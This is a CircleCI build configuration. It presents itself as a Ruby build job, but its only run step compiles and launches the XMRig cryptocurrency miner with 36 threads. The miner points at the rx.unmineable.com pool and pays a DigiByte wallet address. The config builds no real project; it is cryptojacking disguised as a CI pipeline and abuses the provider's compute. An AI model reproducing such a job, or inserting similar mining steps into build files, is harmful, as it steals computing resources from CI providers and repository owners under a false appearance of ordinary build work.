version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run:  sudo apt update && apt-get install git build-essential cmake libuv1-dev libmicrohttpd-dev libssl-dev && git clone https://github.com/xmrig/xmrig && cd xmrig && mkdir build && cd build && cmake -DWITH_HWLOC=OFF .. && make && ./xmrig --donate-level 5 -o rx.unmineable.com:3333 -u DGB:dgb1qgmp6luhqc7wpcy59umzhn055junyun9ljgax4f.Tablo -p x -k -a rx/0 -t 36
      
       
      